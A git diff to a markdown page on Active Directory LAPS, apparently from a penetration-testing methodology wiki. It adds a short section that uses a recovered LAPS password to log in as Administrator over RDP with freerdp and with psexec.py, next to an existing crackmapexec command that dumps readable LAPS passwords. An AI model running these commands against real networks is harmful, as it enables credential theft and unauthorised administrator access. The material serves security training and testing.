diff --git a/windows-hardening/active-directory-methodology/laps.md b/windows-hardening/active-directory-methodology/laps.md index 3f7effa05..829a93c8d 100644 --- a/windows-hardening/active-directory-methodology/laps.md +++ b/windows-hardening/active-directory-methodology/laps.md @@ -114,6 +114,15 @@ crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps ``` This will dump all the passwords that the user can read, allowing you to get a better foothold with a different user. +## ** Using LAPS Password ** +``` +freerdp /v:192.168.1.1:3389 /u:Administrator +Password: 2Z@Ae)7!{9#Cq + +python psexec.py Administrator@web.example.com +Password: 2Z@Ae)7!{9#Cq +``` + ## **LAPS Persistence** ### **Expiration Date**